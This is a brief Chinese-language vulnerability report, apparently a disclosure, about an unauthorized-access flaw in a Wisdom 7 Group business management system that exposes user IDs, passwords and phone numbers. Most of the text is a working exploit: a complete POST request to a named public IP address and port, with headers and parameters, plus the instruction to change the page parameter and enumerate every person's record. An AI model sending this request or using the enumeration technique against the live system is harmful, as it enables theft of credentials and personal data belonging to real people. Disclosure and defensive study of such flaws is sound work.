关键信息 漏洞类型: 未经授权访问漏洞 (Unauthorized Vulnerability) 受影响系统: Wisdom 7 Group 的业务管理系统 影响: 导致重要和敏感信息的泄露,如用户ID、密码和手机号码 复现细节: - 请求URL: POST /api/GylOperator/LoadData HTTP/1.1 - Host: 61.163.217.208:8093 - Content-Length: 75 - X-Requested-With: XMLHttpRequest - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 - Accept: application/json, text/javascript, /; q=0.01 - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - Accept-Encoding: gzip, deflate, br - Accept-Language: zh-CN,zh;q=0.9 - Connection: close - 请求参数: page=5&rows=60&loadAll=false&key=&oper_role=999999&gridFlag=GylOperatorList 利用方式: 修改 参数以翻页并遍历所有人员信息